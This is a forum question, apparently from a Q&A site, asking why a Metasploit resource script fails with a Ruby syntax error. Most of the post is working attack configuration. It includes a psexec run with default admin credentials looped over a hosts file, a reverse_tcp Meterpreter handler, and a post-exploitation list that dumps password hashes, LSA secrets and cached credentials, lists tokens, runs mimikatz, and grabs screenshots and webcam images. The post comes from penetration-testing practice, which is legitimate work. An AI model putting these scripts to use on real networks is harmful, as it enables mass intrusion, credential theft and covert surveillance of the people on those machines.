1

I'm trying to replicate the script on https://www.pentestpartners.com/security-blog/scripting-metasploit-to-exploit-a-group-of-hosts-a-how-to/

On my con_cmd_file I have

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 
set autorunscript multi_console_command -rc /root/Desktop/Scripting/met_cmd_file
set lhost 192.168.1.10 
set lport 4444 
set ExitOnSession false 
exploit -j
use exploit/windows/smb/psexec
set target 1
set smbuser admin
set smbpass admin
set smbdomain Admin
set disablepayloadhandler true

On my met_cmd_file I have

run post/windows/manage/priv_migrate
hashdump
run post/windows/gather/lsa_secrets
run post/windows/gather/cachedump
load incognito
list_tokens -u
screenshot
webcam_list
webcan_snap -v false
load mimikatz
kerberos
background

and on my iter_rc file I have

<ruby>

hostsfile="/root/Desktop/Scripting/hosts_file"
hosts=[]
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# prepare the handler and console
self.run_single("resource /root/Desktop/Scripting/con_cmd_file")
# iterate through each host and run the exploit
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit -j -z") end

</ruby>

However when I run it I get the error

resource (iter_rc.rc)> Ruby Error: SyntaxError /usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:52: unknown regexp options - Dktp ["/usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `eval'", "/usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `load_resource'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:183:in `block in initialize'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `each'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `initialize'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "/usr/bin/msfconsole:49:in `<main>'"]

I already have tried with and without extentions on the files. I have tried with and without " " and with and without < > but not being able to make it work

Can someone tell me what I'm doing wrong and the proper wy to write and run this script?

Thanks

stackstack
  • 11
  • 1

0 Answers0